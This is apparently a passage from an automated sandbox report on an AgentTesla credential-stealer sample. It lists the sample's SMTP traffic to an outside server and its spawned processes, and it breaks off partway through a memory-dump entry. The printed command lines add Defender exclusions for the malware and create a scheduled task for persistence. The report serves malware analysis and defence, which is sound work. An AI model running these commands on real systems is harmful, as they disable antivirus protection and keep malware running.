                                                                    Dec 4, 2024 12:53:26.815933943 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39 | .
                                                                    Dec 4, 2024 12:53:27.555697918 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 250 OK id=1tInwc-00000000CtF-2PEY
                                                                    Dec 4, 2024 12:54:51.289989948 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39 | QUIT

                                                                    Target ID:0
                                                                    Start time:06:52:57
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\Desktop\AWB#150332.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\AWB#150332.exe"
                                                                    Imagebase:0xd90000
                                                                    File size:1'061'896 bytes
                                                                    MD5 hash:DEF8249DC6DF546F68CE491EE14282C9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
                                                                    Imagebase:0x90000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
                                                                    Imagebase:0x90000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"
                                                                    Imagebase:0x2e0000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x1a0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xae0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:06:53:03
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                                                                    Imagebase:0x880000
                                                                    File size:1'061'896 bytes
                                                                    MD5 hash:DEF8249DC6DF546F68CE491EE14282C9
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 26%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:06:53:04
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff7fb730000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:06:53:08
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"
                                                                    Imagebase:0x2e0000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:06:53:08
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:06:53:08
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xb50000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:22
                                                                    Start time:06:53:11
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                                    Imagebase:0xbd0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:06:53:11
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:25
                                                                    Start time:06:53:19
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:06:53:19
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                      Execution Graph

                                                                      Execution Coverage:10.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:95
                                                                      Total number of Limit Nodes:6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93c560d5bf557524e283a37b3a8351812bd583b8dc2a43518df3f099f9025602
                                                                      • Instruction ID: b11daee4c082cdd7ca02a5357699bfc04d738958d330d341eac85d948c095c1a
                                                                      • Opcode Fuzzy Hash: 93c560d5bf557524e283a37b3a8351812bd583b8dc2a43518df3f099f9025602
                                                                      • Instruction Fuzzy Hash: 83416FB1D046589FE714CF6AD9056EAFFF6FF8A201F04C0AAC408AB266DB314945CF51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89c637e55da4813fcc68cb76f74c68df15ad76a85575c8ac342253fa39725724
                                                                      • Instruction ID: 5a1822de94ddb625abf97a8c51aa4f786c4fcfbb36f188644ffc23ce53aebb3c
                                                                      • Opcode Fuzzy Hash: 89c637e55da4813fcc68cb76f74c68df15ad76a85575c8ac342253fa39725724
                                                                      • Instruction Fuzzy Hash: EE2139B1D046588BEB18CFABC8157EEFBF6BF89300F04C46AD40866264DB751549CFA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49343577ffb6fe9a84c7600801fbe4382b9c5c3058a7e33cd558c9bcf2a06743
                                                                      • Instruction ID: 93ca5b2f23a37737907b01a8e779636730e032cff5b8a42271a63688cb6d5e47
                                                                      • Opcode Fuzzy Hash: 49343577ffb6fe9a84c7600801fbe4382b9c5c3058a7e33cd558c9bcf2a06743
                                                                      • Instruction Fuzzy Hash: 4B21C4B1D006199BEB18CF9BC8457DEFBF6BFC9300F14C46AD409A6264DB75194A8FA0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D646
                                                                      • GetCurrentThread.KERNEL32 ref: 0180D683
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D6C0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0180D719
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: baa46eaaa482a41b84f9ec29d55a4d4f6510433189e93c674408c761a9b51cb9
                                                                      • Instruction ID: c3f58cbee874e9f9318f2ba931fa6f507646f23326fc0cb7b32ea5260fa93c66
                                                                      • Opcode Fuzzy Hash: baa46eaaa482a41b84f9ec29d55a4d4f6510433189e93c674408c761a9b51cb9
                                                                      • Instruction Fuzzy Hash: 635166B0D003098FEB54DFAAD948B9EBBF1EF88310F208519E419A73A0DB359945CF65

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D646
                                                                      • GetCurrentThread.KERNEL32 ref: 0180D683
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D6C0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0180D719
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: f535f4182ca989dc70e516170a588a84b8a1b53d50a8e23d4090bcda4e3935e4
                                                                      • Instruction ID: 7a2338b9416a6328f38208d068503ad835e6430b2723303de0a2f5a0ebdc795a
                                                                      • Opcode Fuzzy Hash: f535f4182ca989dc70e516170a588a84b8a1b53d50a8e23d4090bcda4e3935e4
                                                                      • Instruction Fuzzy Hash: 645167B09003098FEB54DFAAD948B9EBBF1EF88310F208119E419A73A0DB359945CF65

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 753e194-753e4e5 (blocks coloured Executed / Not Executed), calls CreateProcessA
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0753E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 91126722cd2f6e940bd891bce962d3b27c41a832e4e09a73ff6fe1c18ae7c386
                                                                      • Instruction ID: 80466abc6bcde47f3bf22ce239d46147f5892a0b4744350a5749db007ef875cf
                                                                      • Opcode Fuzzy Hash: 91126722cd2f6e940bd891bce962d3b27c41a832e4e09a73ff6fe1c18ae7c386
                                                                      • Instruction Fuzzy Hash: 51A13EB1D0071ACFEB24DF68C841BEDBBF1BB49310F14856AE848A7290DB759985CF91

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 753e1a0-753e4e5 (blocks coloured Executed / Not Executed), calls CreateProcessA
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0753E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 33ad5b5a384a59e2d2e0409d0ed879938f805625f5add722d2266c623dea174d
                                                                      • Instruction ID: 6b771719ba05992a8284e71c49ebbb0acd24847b5e540bf762eb5333aa181a5b
                                                                      • Opcode Fuzzy Hash: 33ad5b5a384a59e2d2e0409d0ed879938f805625f5add722d2266c623dea174d
                                                                      • Instruction Fuzzy Hash: 2B912CB1D0071ACFEB24DF68C841BDDBBF2BB49310F14856AE848A7290DB759985CF91

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 180af19-180b1a8 (blocks coloured Executed / Not Executed), calls 18098a0, 180b1b0, 180b1c0, 180a270, 180a280, 180a290, 180a2a0 and GetModuleHandleW
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0180B17E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 84aaef0ab29e9cac7bf1c1d1b6b08a7d3b16daabe26c6f95621f26507a740758
                                                                      • Instruction ID: 6d4b2f4df22b012486f0da61762dbfe55196481a08cb84a3ee755f77c795850c
                                                                      • Opcode Fuzzy Hash: 84aaef0ab29e9cac7bf1c1d1b6b08a7d3b16daabe26c6f95621f26507a740758
                                                                      • Instruction Fuzzy Hash: 6B814574A00B098FE766CF29D84075ABBF1BF48304F00892DD49AD7A90D735E94ACB91

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 180449c-1805a61 (blocks coloured Executed / Not Executed), calls CreateActCtxA
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 018059C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: ef0587d94d3f8a2112013612400d59df31ca9e00045c6bf9311355abbae55c14
                                                                      • Instruction ID: 7bf1150c27d3a09ab73e0bfe647d8ba231be6300225882bdae7bf6d85d396650
                                                                      • Opcode Fuzzy Hash: ef0587d94d3f8a2112013612400d59df31ca9e00045c6bf9311355abbae55c14
                                                                      • Instruction Fuzzy Hash: CA41D271C0071DCBDB25DFA9C884B9DBBB5BF49314F20816AD408AB251DB756A46CF90

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 180590c-1805a61 (blocks coloured Executed / Not Executed), calls CreateActCtxA
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 018059C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 83f3fa9e2af103354bc9c248b928810eff0d90a08913d0b889754add82fcd6df
                                                                      • Instruction ID: eaae8798c16d98153d3ce84e0faa85d38756f229f76080a140cc1a19af7bd1bc
                                                                      • Opcode Fuzzy Hash: 83f3fa9e2af103354bc9c248b928810eff0d90a08913d0b889754add82fcd6df
                                                                      • Instruction Fuzzy Hash: 7C41D071C0071DCFDB25CFA9C884B8DBBB1BF49314F20816AD408AB251DB756A46CF50

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 7515d50-7515e22 (blocks coloured Executed / Not Executed), calls DrawTextExW
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07515DEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280056316.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7510000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 926abe7314eee094dcf72bcf812cb4d51c241f9ac01fbd5ecf108f9d7024a09e
                                                                      • Instruction ID: 7c6b676ef25306ba2ff9520f263bae0b782ff06afb617f9adec672502fc708bc
                                                                      • Opcode Fuzzy Hash: 926abe7314eee094dcf72bcf812cb4d51c241f9ac01fbd5ecf108f9d7024a09e
                                                                      • Instruction Fuzzy Hash: F831E4B5D0030A9FDB10CF9AD884ADEFBF5FB48310F14842AE919A7210D775A945CFA4

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 753df10-753dfee (blocks coloured Executed / Not Executed), calls WriteProcessMemory
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0753DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 5a4eb20df27df1f5a763c38afe62f5c5e12f5da35ced8c7f54a198b0cc88ec36
                                                                      • Instruction ID: 5395b2f5333251012f0b6a6d9bc7d03197601f58998d9be4663b836dc20fb101
                                                                      • Opcode Fuzzy Hash: 5a4eb20df27df1f5a763c38afe62f5c5e12f5da35ced8c7f54a198b0cc88ec36
                                                                      • Instruction Fuzzy Hash: CE2137B5D003499FDB10CFA9C885BEEBBF1FB48310F10842AE918A7250C7799941CBA4

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 7515d58-7515e22 (blocks coloured Executed / Not Executed), calls DrawTextExW
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07515DEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280056316.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7510000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 7feb2766d31a1a33cb255aa35c1537f79cf270090550f1bf08543d3dca573211
                                                                      • Instruction ID: 1bf8b18b0f2cbb4e172395c6a97d602dd6a8826b661563b2a7c4b0abaf27a8ec
                                                                      • Opcode Fuzzy Hash: 7feb2766d31a1a33cb255aa35c1537f79cf270090550f1bf08543d3dca573211
                                                                      • Instruction Fuzzy Hash: 2221C3B5D0030A9FDB10CF9AD884ADEFBF5FB48310F14842AE919A7210D775A955CFA4

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 753e000-753e0ce (blocks coloured Executed / Not Executed), calls ReadProcessMemory
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0753E088
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 8d2eac37ba7a833e23e95c7b35a05b0cdc107e6e49cde02cc19c2f3e6220afaf
                                                                      • Instruction ID: 81c60326a56a28143f265649f29ba321d727869329fcd49c706053d91b45d78f
                                                                      • Opcode Fuzzy Hash: 8d2eac37ba7a833e23e95c7b35a05b0cdc107e6e49cde02cc19c2f3e6220afaf
                                                                      • Instruction Fuzzy Hash: E5213B71C003499FDB10DFAAD841BEEBBF5FF48320F50842AE918A7250C7799941CBA5

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 753df18-753dfee (blocks coloured Executed / Not Executed), calls WriteProcessMemory
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0753DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 2a4201081692622dcb95711f81edf7a70916aa6f7376afd3f72fb4c51e6e42cd
                                                                      • Instruction ID: fef48b15f7802a480ab067c9e0c1b5ed6ba042cb118c16227ae87c4d145da573
                                                                      • Opcode Fuzzy Hash: 2a4201081692622dcb95711f81edf7a70916aa6f7376afd3f72fb4c51e6e42cd
                                                                      • Instruction Fuzzy Hash: 6D2127B5D003499FDB10DFAAC885BDEBBF5FF48310F10842AE918A7250C7799945CBA4

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 753d970-753da3c (blocks coloured Executed / Not Executed), calls Wow64SetThreadContext
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0753D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 3954ba3b0cab66d41dc251cd04284faa3ba0b0fc89cf029dc768aff5d4cad253
